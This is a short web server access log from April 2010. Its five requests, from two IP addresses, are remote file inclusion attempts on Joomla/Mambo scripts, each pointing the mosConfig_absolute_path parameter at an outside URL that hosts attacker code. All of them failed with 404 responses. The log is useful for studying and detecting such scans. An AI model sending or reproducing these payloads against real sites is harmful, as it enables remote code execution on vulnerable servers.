222.236.47.182 - - [07/Apr/2010:14:39:42 -0500] "GET /logs/access_log.1260662400////index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [07/Apr/2010:14:39:43 -0500] "GET /logs////index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dossierpolitico.com//galeria/panistasexpoforum45.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:14:39:53 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:14:39:53 -0500] "GET /logs/access_log.1218067200%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.15.158.246 - - [07/Apr/2010:14:39:53 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.puzzlecis.com/p1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
